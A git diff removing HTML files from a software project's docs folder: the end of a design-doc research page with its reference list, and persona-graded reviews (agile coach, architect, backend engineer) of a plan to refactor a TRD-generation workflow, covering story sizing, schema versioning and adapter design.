-<li>Ubl, M. &quot;Design Docs at Google.&quot; <a href="https://www.industrialempathy.com/posts/design-docs-at-google/">industrialempathy.com</a></li>
-<li>Larson, W. &quot;Writing an engineering strategy.&quot; <a href="https://lethain.com/eng-strategies/">lethain.com/eng-strategies</a> · <em>An Elegant Puzzle: Systems of Engineering Management</em></li>
-<li>Orosz, G. &quot;Companies Using RFCs or Design Docs and Examples of These.&quot; <a href="https://blog.pragmaticengineer.com/rfcs-and-design-docs/">blog.pragmaticengineer.com/rfcs-and-design-docs</a></li>
-<li>Bryar, C., &amp; Carr, B. (2021). <em>Working Backwards: Insights, Stories, and Secrets from Inside Amazon</em>. <a href="https://workingbackwards.com/concepts/working-backwards-pr-faq-process/">workingbackwards.com PR/FAQ summary</a></li>
-<li>Costa, L. &quot;Design docs are dead and we killed them.&quot; <a href="https://www.lucasfcosta.com/blog/design-docs">lucasfcosta.com/blog/design-docs</a></li>
-<li>Turnbull, D. &quot;Throwaway PRs, not design docs.&quot; <a href="https://softwaredoug.com/blog/2024/12/14/throwaway-prs-not-design-docs">softwaredoug.com</a></li>
-<li>Cvet, M. &quot;Goals and Failure Modes for RFCs and Technical Design Documents.&quot; <a href="https://medium.com/better-programming/goals-and-failure-modes-for-rfcs-and-technical-design-documents-c4ee1d1da6ff">Better Programming, Medium, 2020</a></li>
-<li>Squarespace Engineering. &quot;The Power of 'Yes, If'.&quot; <a href="https://engineering.squarespace.com/blog/2019/the-power-of-yes-if">engineering.squarespace.com</a></li>
-<li>Kashitsyn, R. &quot;Effective design docs.&quot; <a href="https://mmapped.blog/posts/31-effective-design-docs">mmapped.blog</a></li>
-<li>McCaffrey, C. &quot;Design docs, markdown, and Git.&quot; <a href="https://caitiem20.wordpress.com/2020/03/29/design-docs-markdown-and-git/">caitiem20.wordpress.com</a></li>
-<li>&quot;Decoding the Dichotomy: PRD vs TRD.&quot; <a href="https://medium.com/@kokoproduct/decoding-the-dichotomy-prd-vs-trd-67463a29aa84">Koko Product, Medium</a></li>
-<li>&quot;How to write a PRD that engineers actually read.&quot; <a href="https://plane.so/blog/how-to-write-a-prd-that-engineers-actually-read">Plane.so blog</a></li>
-<li>Atlassian. &quot;Anchors in Confluence.&quot; <a href="https://confluence.atlassian.com/doc/anchors-139442.html">confluence.atlassian.com/doc/anchors-139442.html</a></li>
-<li>Atlassian. &quot;Configuring issue linking.&quot; <a href="https://confluence.atlassian.com/adminjiraserver/configuring-issue-linking-938847862.html">confluence.atlassian.com/adminjiraserver/configuring-issue-linking-938847862.html</a></li>
-<li>ClickUp. &quot;Intro to Relationships.&quot; <a href="https://help.clickup.com/hc/en-us/articles/6304528030743-Intro-to-Relationships">help.clickup.com/.../6304528030743</a></li>
-<li>Brown, S. &quot;The C4 model for visualising software architecture.&quot; <a href="https://c4model.com/">c4model.com</a></li>
-<li>Notion. &quot;Create links and backlinks.&quot; <a href="https://www.notion.com/help/create-links-and-backlinks">notion.com/help/create-links-and-backlinks</a></li>
-<li>HN thread on design-doc anti-patterns (item 44779428). <a href="https://news.ycombinator.com/item?id=44779428">news.ycombinator.com/item?id=44779428</a></li>
-<li>HN thread on RFC-process cost (item 18145205). <a href="https://news.ycombinator.com/item?id=18145205">news.ycombinator.com/item?id=18145205</a></li>
-<li>HN thread on over-specification (item 46221016). <a href="https://news.ycombinator.com/item?id=46221016">news.ycombinator.com/item?id=46221016</a></li>
-<li>Lobsters discussion on Design Docs at Google. <a href="https://lobste.rs/s/rullsv/design_docs_at_google">lobste.rs/s/rullsv</a></li>
-<li>ADR catalog. <a href="https://adr.github.io/">adr.github.io</a></li>
-</ul>
-<h3 id="internal-references-notion--reference-workspace">Internal references (Notion — reference workspace)</h3>
-<ul>
-<li><a href="https://www.notion.so/29a1ab62faf5805ea7dadefb9d052af0">Reference TRD Template</a> (last edited 2025-11-04)</li>
-<li>Reference LLD example (per-library scope, 2026-05-10) — per-library LLD example</li>
-<li>Reference HLD example (module-first, 2026-04-15)</li>
-<li>Reference HLD example with &quot;Solutioning&quot; sibling label (2026-04-01)</li>
-<li>Reference HLD example (minimal, small features, 2026-05-21)</li>
-<li>Reference TRD with explicit 5-phase Implementation Plan precedent (2026-01-04)</li>
-</ul>
-<h3 id="internal-references-shield-repo">Internal references (Shield repo)</h3>
-<ul>
-<li><code>docs/shield/agent-behavior-decomposition-20260520/outputs/plan-architecture.html</code> — baseline ADR+HLD hybrid the TRD must improve on</li>
-<li><a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43</a> — <code>docs/superpowers/specs/2026-05-18-lld-sample.html</code> — canonical 14-section LLD sample (Bytebite user-signup); reference structure for the <code>/lld</code> command</li>
-</ul>
-<h2 id="further-exploration">Further Exploration</h2>
-<p><em>Curated for going deeper; NOT cited in body above.</em></p>
-<h3 id="books">Books</h3>
-<ul>
-<li>Bass, L., Clements, P., Kazman, R. (2021). <em>Software Architecture in Practice</em> (4th ed.). The module/component-and-connector/allocation viewtype taxonomy is a cleaner alternative to Pressman's four layers.</li>
-<li>Bryar, C., Carr, B. (2021). <em>Working Backwards.</em> Amazon's PR/FAQ tradition for the PRD-upstream framing.</li>
-<li>Fournier, C. (2017). <em>The Manager's Path.</em> ADRs vs design docs distinction in tech-lead chapters.</li>
-</ul>
-<h3 id="long-form-blogs--articles">Long-form blogs / articles</h3>
-<ul>
-<li>Brown, S. &quot;The C4 model for visualising software architecture.&quot; <a href="https://c4model.com/">c4model.com</a> — quoted in body above; Container/Component levels are the chosen LLD granularity.</li>
-<li>arc42 template. <a href="https://arc42.org/">arc42.org</a> — open-source 12-chapter architecture-doc scaffold widely used in DE/EU teams.</li>
-<li>ThoughtWorks. &quot;Lightweight architecture decision records.&quot; For the &quot;TRD = HLD + ADR&quot; hybrid Shield is gravitating toward.</li>
-</ul>
-<h3 id="videos--talks">Videos / talks</h3>
-<ul>
-<li>Larson, W. on engineering strategy at LeadDev. For the &quot;five design docs → one strategy&quot; pattern.</li>
-</ul>
-<h3 id="courses">Courses</h3>
-<ul>
-<li>(None curated this round — open opportunity.)</li>
-</ul>
-<h3 id="podcasts--podcast-episodes">Podcasts / podcast episodes</h3>
-<ul>
-<li><em>StaffEng Podcast</em> — multiple episodes on design-doc practice with senior+ engineers.</li>
-</ul>
-<h3 id="other">Other</h3>
-<ul>
-<li>Joel Henderson's ADR catalog. <a href="https://adr.github.io/">adr.github.io</a> — patterns for ADRs as supplement to (not replacement of) HLD.</li>
-<li>HashiCorp's public RFC template. Useful comparison point for infra-leaning teams.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
deleted file mode 100644
index fe95f4e3..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/agile-coach.html
+++ /dev/null
@@ -1,165 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="agile-coach--detailed-findings">Agile Coach — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="agile-coach-review-grade-a-">Agile Coach Review (Grade: A-)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>AC1</td>
-<td>Story sizing</td>
-<td>A</td>
-<td>12 stories across 5 epics, each story is a clear, atomic deliverable. None are multi-week; none are trivial sub-tasks. EPIC-3-S2 is the largest (14 negative fixtures) but is appropriately scoped as one cohesive deliverable.</td>
-</tr>
-<tr>
-<td>AC2</td>
-<td>Story independence</td>
-<td>A-</td>
-<td>M1 stories can largely run in parallel (EPIC-1-S1, EPIC-2-S1, EPIC-3-S1 are independent docs/schema/fixture tasks). EPIC-1-S2 depends implicitly on EPIC-1-S1's slug allow-list; EPIC-2-S2 depends on EPIC-2-S1; EPIC-3-S2 depends on EPIC-3-S1's positive fixture. These intra-milestone deps could be explicit but are inferable from content.</td>
-</tr>
-<tr>
-<td>AC3</td>
-<td>Dependency ordering</td>
-<td>A</td>
-<td>Milestones have an explicit DAG: <code>M1 → M2 → M3</code> via <code>depends_on</code> in <code>sidecar.milestones[]</code>. No cycles. EPIC-3-S3 explicitly orders RED before GREEN. Story sequencing within M1 is logical (template → emit → re-run guard; schema → populate; fixtures → wire).</td>
-</tr>
-<tr>
-<td>AC4</td>
-<td>Context completeness</td>
-<td>A</td>
-<td>Every story has a &quot;why&quot; paragraph in <code>description</code>. Examples: EPIC-2-S1 explains &quot;preserve back-compat (missing field is ignored)&quot;; EPIC-5-S1 explains &quot;Countermeasure for undead-doc drift&quot;; EPIC-1-S3 explains the deterministic re-run policy and &quot;no migration.&quot;</td>
-</tr>
-<tr>
-<td>AC5</td>
-<td>Requirements clarity</td>
-<td>A</td>
-<td>Requirements are specific and measurable. Examples: &quot;exactly 14 entries&quot; in slug list (EPIC-1-S1 AC2), &quot;40-char hex sha&quot; (EPIC-5-S1 AC2), &quot;&gt; 80 characters of consecutive verbatim overlap&quot; (EPIC-4-S2 task), &quot;&gt;20-line code block&quot; threshold (EPIC-5-S2).</td>
-</tr>
-<tr>
-<td>AC6</td>
-<td>Implementation step quality</td>
-<td>A-</td>
-<td>Tasks cite exact files, exact field names, and exact thresholds. Minor gap: EPIC-4-S3 says &quot;Update the relevant adapter logic&quot; without naming the adapter files for each tool (just the directory).</td>
-</tr>
-<tr>
-<td>AC7</td>
-<td>Acceptance criteria testability</td>
-<td>A</td>
-<td>Every AC is testable. Examples: &quot;exit code 0&quot; (EPIC-3-S1), &quot;reports that section by slug as a Critical finding&quot; (EPIC-4-S1), &quot;40-char hex sha&quot; (EPIC-5-S1). No vagueness.</td>
-</tr>
-<tr>
-<td>AC8</td>
-<td>Sprint-readiness</td>
-<td>A</td>
-<td>Each story declares <code>&quot;status&quot;: &quot;ready&quot;</code>. File paths, schemas, thresholds, and named errors are all pre-decided. A developer could pick up any story without a planning meeting.</td>
-</tr>
-<tr>
-<td>AC9</td>
-<td>Estimation feasibility</td>
-<td>A-</td>
-<td>Detail is sufficient for confident estimation. EPIC-3-S2 (14 missing-section fixtures + drift + vague-TBD) is the largest unit of work and could be split for tighter sizing.</td>
-</tr>
-<tr>
-<td>AC10</td>
-<td>Definition of Done alignment</td>
-<td>B+</td>
-<td>DoD is implied: code change + eval fixture + RED→GREEN paper trail (CLAUDE.md mandate). No explicit mention of code review, deploy-to-staging, or user-facing CHANGELOG.</td>
-</tr>
-<tr>
-<td>AC13</td>
-<td>Milestone coverage</td>
-<td>A</td>
-<td>Every milestone has covering stories: M1 = 8, M2 = 3, M3 = 2. No milestone is empty.</td>
-</tr>
-<tr>
-<td>AC14</td>
-<td>Milestone reference integrity</td>
-<td>A</td>
-<td>Every story's <code>milestone_id</code> is <code>M1</code>, <code>M2</code>, or <code>M3</code> — all match <code>sidecar.milestones[].id</code>. No dangling references.</td>
-</tr>
-<tr>
-<td>AC15</td>
-<td>Milestone exit criteria testability</td>
-<td>A</td>
-<td>All exit criteria are testable.</td>
-</tr>
-<tr>
-<td>AC16</td>
-<td>Milestone DAG integrity</td>
-<td>A</td>
-<td>DAG is <code>M1 → M2 → M3</code>. Linear chain, no cycles.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> Sprint-ready plan — every story has crisp file targets, exact thresholds, named errors, and testable ACs; the milestone DAG and reference integrity are clean; the only meaningful gap is that the largest story (EPIC-3-S2) could be split for finer estimation, and DoD's code-review/changelog rituals are implicit.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P2</td>
-<td>AC9</td>
-<td>Split EPIC-3-S2 into two stories: (a) &quot;Build negative-fixture generator + 14 missing-section fixtures&quot; and (b) &quot;Author drift-by-addition + vague-TBD fixtures.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC6</td>
-<td>In EPIC-4-S3, name the adapter file per tool instead of &quot;Update the relevant adapter logic.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC10</td>
-<td>Add one cross-cutting AC requiring a CHANGELOG entry / migration note documenting the cutover.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC2</td>
-<td>Make intra-milestone story ordering explicit (e.g., EPIC-1-S2 depends on EPIC-1-S1 slug list; EPIC-3-S2 depends on EPIC-3-S1 positive fixture).</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
deleted file mode 100644
index 3d281ad2..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/architect.html
+++ /dev/null
@@ -1,149 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="architect--detailed-findings">Architect — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="architect-review-grade-b">Architect Review (Grade: B)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>CA1</td>
-<td>Artifact/component topology</td>
-<td>A</td>
-<td>The artifact graph is well-formed: <code>research.md</code> → <code>trd.md</code> (14 sections w/ stable kebab anchors) → <code>plan.json</code> (stories with <code>design_refs[]</code> pointing at TRD anchors) → <code>/pm-sync</code> adapters → PM tools. Anchor scheme (<code>{#section-id}</code>) is explicitly defined as the join key. EPIC-1-S1 publishes the slug allow-list as a machine-readable sidecar under <code>shield/schema/</code> so eval/review/generator all import from the same source — single source of truth.</td>
-</tr>
-<tr>
-<td>CA2</td>
-<td>Schema/template growth</td>
-<td>B</td>
-<td>Schema evolution path is explicit: 1.1 → 1.2 (<code>design_refs[]</code>) → 1.3 (<code>last_aligned_with</code>), each additive. Gap: the plan does not specify what happens when the 14-section list itself needs to evolve. A <code>template_version</code> field on TRD frontmatter would close this.</td>
-</tr>
-<tr>
-<td>CA3</td>
-<td>Backward compatibility</td>
-<td>A</td>
-<td>Backward compatibility is rigorously asserted across every schema change. Adapters without link affordance log and continue gracefully. Old <code>plan-architecture.md</code> files explicitly preserved.</td>
-</tr>
-<tr>
-<td>CA4</td>
-<td>Cross-tool / cross-domain reach</td>
-<td>B</td>
-<td>Multi-tool reach well covered. Multi-domain reach is headline (one TRD, two domains). Gap: &quot;Mixed → annotate per section&quot; is a single sentence with no worked example or fixture. A monorepo with both <code>*.tf</code> and <code>pyproject.toml</code> is realistic and the plan punts. No mixed-domain positive fixture in EPIC-3-S1.</td>
-</tr>
-<tr>
-<td>CA5</td>
-<td>Contract/interface design across components</td>
-<td>A</td>
-<td>Contract surfaces are tight: <code>design_refs[]</code> shape fully defined; section anchors use explicit <code>{#section-id}</code> kebab-case; slug allow-list machine-readable; LLD placeholder shape precisely specified. Forward-looking contract that lets <code>/lld</code> resolve TODOs later without schema change.</td>
-</tr>
-<tr>
-<td>CA6</td>
-<td>Blast radius / failure-mode isolation</td>
-<td>B</td>
-<td>Several failure modes explicitly handled and isolated (re-run safety, PM-sync degraded mode, eval gates cutover, undead-doc drift countered). Gaps: (a) stale <code>design_refs[].anchor_url</code> when section renamed/deleted between runs — <code>/plan-review</code> has no detection; (b) <code>last_aligned_with</code> race when working tree is dirty; (c) eval fixture set falling out of sync with live slug allow-list.</td>
-</tr>
-<tr>
-<td>CA7</td>
-<td>Mechanism choice for each concern</td>
-<td>B</td>
-<td>Mostly well-reasoned (markdown anchors, eval-as-enforcement, additive schema growth, substring-overlap for duplication detection). Concerns: (a) EPIC-4-S2 &quot;&gt; 80 characters&quot; magic number undefended; (b) EPIC-5-S2 &quot;&gt;20 lines&quot; same; (c) <code>last_aligned_with</code> records commit SHA but doesn't capture whether the TRD itself has changed since that SHA — a <code>trd_sha</code> content hash would catch post-commit edits.</td>
-</tr>
-<tr>
-<td>CA8</td>
-<td>Positive ↔ negative fixture parity &amp; template ↔ eval ↔ review consistency</td>
-<td>B</td>
-<td>Parity mostly enforced. 14 missing-section negatives derived from positive by removing one — right pattern. Slug allow-list imported by generator + eval + review. Gaps: (a) no round-trip integration eval (<code>/plan</code> output → <code>/plan-review</code> says no Criticals); (b) no positive fixture for mixed-domain or LLD-TODO placeholder shape; (c) <strong>EPIC-3-S3 AC says &quot;13 negatives&quot; — actual count is 14 missing-section + 1 drift + 1 vague-TBD = 16. Off-by-N inconsistency between AC text and fixture inventory in EPIC-3-S2</strong>.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The plan has unusually rigorous artifact-topology design but leaks credibility through small inconsistencies — <code>plan-architecture.md</code> still says &quot;13-section&quot; at lines 25, 37, 75; EPIC-3-S3 says &quot;13 negatives&quot; when EPIC-3-S2 enumerates 16; the mixed-domain path is asserted (&quot;Mixed → annotate per section&quot;) without a worked example or fixture. Headline architectural choices are sound; gaps are in edge-case completeness.</p>
-<h3 id="recommendations">Recommendations</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>CA8</td>
-<td>Fix the negative-fixture count inconsistency. <code>plan.md</code> EPIC-3-S3 AC says &quot;all 13 negatives fail&quot; but EPIC-3-S2 enumerates 16. Pick a number and propagate.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>CA8</td>
-<td>Fix the stale &quot;13-section&quot; references in <code>plan-architecture.md</code> (lines 25, 37, 75). Reconcile to 14 everywhere.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>CA4</td>
-<td>Add a worked example and at least one eval fixture for the mixed-domain case: (a) <code>positive-mixed/</code> fixture, (b) explicit guidance in plan-docs/SKILL.md, (c) detection rule for mixed (both infra and backend markers).</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>CA6</td>
-<td>Specify stale-anchor detection. Add an AC to EPIC-4-S1: &quot;/plan-review reports any <code>design_refs[].anchor_url</code> whose <code>#section-id</code> is not present in the linked trd.md as a Critical finding.&quot;</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA7</td>
-<td>Defend or parameterize the magic numbers (&gt;80 char overlap, &gt;20 line code block).</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA7</td>
-<td>Consider adding <code>trd_sha</code> (content hash) alongside <code>last_aligned_with</code> (commit SHA) in EPIC-5-S1.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA2</td>
-<td>Add a TRD <code>template_version</code> field so legitimate template evolution doesn't trigger the drift-by-addition negative.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>CA8</td>
-<td>Add a round-trip integration eval: <code>/plan</code> output → <code>/plan-review</code> asserts no Critical findings.</td>
-</tr>
-</tbody>
-</table>
-
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html b/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
deleted file mode 100644
index d4142e75..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/detailed/backend-engineer.html
+++ /dev/null
@@ -1,165 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8">
-<title>Plan Review — /plan TRD refactor</title>
-<style>
-body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Arial, sans-serif; max-width: 960px; margin: 0 auto; padding: 24px; line-height: 1.6; color: #202124; }
-h1 { color: #1a73e8; border-bottom: 2px solid #1a73e8; padding-bottom: 10px; }
-h2 { color: #202124; border-bottom: 1px solid #dadce0; padding-bottom: 8px; margin-top: 32px; }
-h3 { color: #5f6368; margin-top: 22px; }
-h4 { color: #5f6368; margin-top: 18px; font-size: 1.05em; }
-table { border-collapse: collapse; width: 100%; margin: 15px 0; }
-th, td { border: 1px solid #dadce0; padding: 10px; text-align: left; vertical-align: top; }
-th { background-color: #f1f3f4; font-weight: bold; }
-tr:nth-child(even) { background-color: #f8f9fa; }
-code { background-color: #f1f3f4; padding: 2px 6px; border-radius: 4px; font-family: 'SF Mono', Menlo, 'Courier New', monospace; font-size: 13px; }
-pre { background-color: #f1f3f4; padding: 14px; border-radius: 8px; overflow-x: auto; font-family: 'SF Mono', Menlo, 'Courier New', monospace; white-space: pre; font-size: 12px; line-height: 1.4; }
-pre code { background: transparent; padding: 0; }
-blockquote { border-left: 4px solid #1a73e8; margin: 15px 0; padding: 10px 20px; background-color: #e8f0fe; }
-ul, ol { margin: 10px 0; padding-left: 24px; }
-li { margin: 4px 0; }
-hr { border: none; border-top: 1px solid #dadce0; margin: 24px 0; }
-a { color: #1a73e8; text-decoration: none; }
-a:hover { text-decoration: underline; }
-strong { font-weight: 600; }
-</style>
-</head>
-<body>
-<h1 id="backend-engineer--detailed-findings">Backend Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="backend-engineer-review-grade-c">Backend Engineer Review (Grade: C+)</h2>
-<p><strong>Scope:</strong> Python-touching stories in Shield's own codebase. Primary target: EPIC-4-S3 (adapter changes). Secondary: EPIC-2-S1 / EPIC-5-S1 (schema bumps), EPIC-3-S1/S2/S3 (eval wiring).
-<strong>Stack detected:</strong> Python (uv-managed). <code>pyproject.toml</code> at <code>shield/adapters/clickup/</code>, plus <code>shield/adapters/sast/*/pyproject.toml</code>. No framework-specific Python skills yet — agnostic review applies.</p>
-<h3 id="score-summary">Score Summary</h3>
-<table>
-<thead>
-<tr>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Rationale</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>API design / adapter interface stability (EPIC-4-S3)</td>
-<td><strong>C</strong></td>
-<td>Schema shape locked, but adapter contract (signature, return type, error model, per-tool retry/idempotency) unspecified</td>
-</tr>
-<tr>
-<td>Schema versioning discipline (EPIC-2-S1, EPIC-5-S1)</td>
-<td><strong>B</strong></td>
-<td>Bumps to 1.2/1.3 with explicit back-compat statements; no formal <code>$id</code>/<code>$schema</code>, no validator, no rejection of unknown future versions</td>
-</tr>
-<tr>
-<td>Testing strategy (EPIC-3 + EPIC-4-S3 fixtures)</td>
-<td><strong>B-</strong></td>
-<td>Strong fixture topology for TRD format; per-adapter fixtures only sketched — HTTP-mocking strategy, fault-injection, and idempotency replay absent</td>
-</tr>
-<tr>
-<td>Framework patterns / uv-based deps (adapter package layout)</td>
-<td><strong>D</strong></td>
-<td>Plan adds adapter logic in <code>shield/adapters/</code> for Confluence/Jira/Notion but only <code>clickup</code> is a packaged uv module today; no story scaffolds new packages, deps, or test harness</td>
-</tr>
-<tr>
-<td>Error &amp; observability (adapter failure modes)</td>
-<td><strong>D+</strong></td>
-<td>One log-line described; no structured logging, no partial-failure semantics, no metric/event surface</td>
-</tr>
-<tr>
-<td>Concurrency &amp; idempotency (sync re-runs, design_refs upserts)</td>
-<td><strong>D</strong></td>
-<td>EPIC-2-S2 mentions &quot;preserved or updated in place&quot;; nothing about idempotent remote-link upsert (Jira/Confluence remote-links can dupe on re-run without externalId)</td>
-</tr>
-<tr>
-<td>Deployment safety / blast radius (direct cutover)</td>
-<td><strong>C</strong></td>
-<td>Direct cutover acknowledged; rollback path documented; but no kill switch, no canary, and EPIC-1-S2 mutates <code>output-paths.yaml</code> keys (consumer-facing contract)</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Composite: C+</strong> — the plan's <em>what</em> is well-shaped; the <em>how</em> leaks responsibility to implementation time for the parts that historically cause incidents (adapter idempotency, partial failures, schema validator wiring).</p>
-<h3 id="detailed-evaluation">Detailed Evaluation</h3>
-<h4 id="1-api-design--adapter-interface-stability--c">1. API design / adapter interface stability — <strong>C</strong></h4>
-<p><strong>What the plan says:</strong></p>
-<ul>
-<li>EPIC-4-S3 task: &quot;Update the relevant adapter logic (Python under <code>shield/adapters/</code>) for each tool: Confluence remote link, Jira remote-issue-link, ClickUp URL custom field, Notion URL property.&quot;</li>
-<li>EPIC-4-S3 task: &quot;Adapters that do not understand <code>design_refs[]</code> (or have no link affordance) log 'design_refs forwarding skipped — adapter does not support web links' instead of failing.&quot;</li>
-</ul>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong>No adapter interface contract.</strong> No Python function/method signature for <code>design_refs[]</code> forwarding. Without a typed contract, four adapters will drift in shape.</li>
-<li><strong>No return-type discipline.</strong> <code>pm-sync</code> already has a <code>pm_sync</code> MCP tool surface (<code>shield/adapters/clickup/server/tools/sync.py:115</code>). The plan doesn't say how the new forwarding result threads back into the existing <code>sync_auto_link</code> action_log path.</li>
-<li><strong>The four adapters are heterogeneous on link semantics</strong> — Jira remote-issue-link, Confluence remote-link, ClickUp URL custom-field, Notion URL property. The plan treats them as a single bullet.</li>
-<li><strong>No idempotency key.</strong> Jira/Confluence remote-links accept a <code>globalId</code> precisely so reruns don't duplicate.</li>
-</ul>
-<h4 id="2-schema-versioning-discipline--b">2. Schema versioning discipline — <strong>B</strong></h4>
-<p><strong>Strengths:</strong> Two version bumps with explicit back-compat statements. <code>DesignRef</code> shape published. <code>last_aligned_with: string | null</code> precisely typed.</p>
-<p><strong>Gaps:</strong></p>
-<ul>
-<li><strong>No machine-readable JSON Schema.</strong> The sidecar schema lives as prose+jsonc. No validator, no story to add one. This is the inflection point where prose-only schemas drift.</li>
-<li><strong>No forward-compat policy.</strong> What does <code>/plan-review</code> do when it encounters <code>version: &quot;1.4&quot;</code> from a future Shield?</li>
-<li><strong><code>doc ∈ {trd, lld, prd}</code> is an enum</strong> but the plan does not say whether it's enforced. Unknown <code>doc</code> should fail validation.</li>
-<li><strong><code>design_refs[]</code> cardinality.</strong> EPIC-2-S2 says &quot;at least one TRD design_ref per story&quot; — should be lifted into <code>sidecar-schema.md</code> as a &quot;minimum 1&quot; constraint.</li>
-</ul>
-<h4 id="3-testing-strategy--b-">3. Testing strategy — <strong>B-</strong></h4>
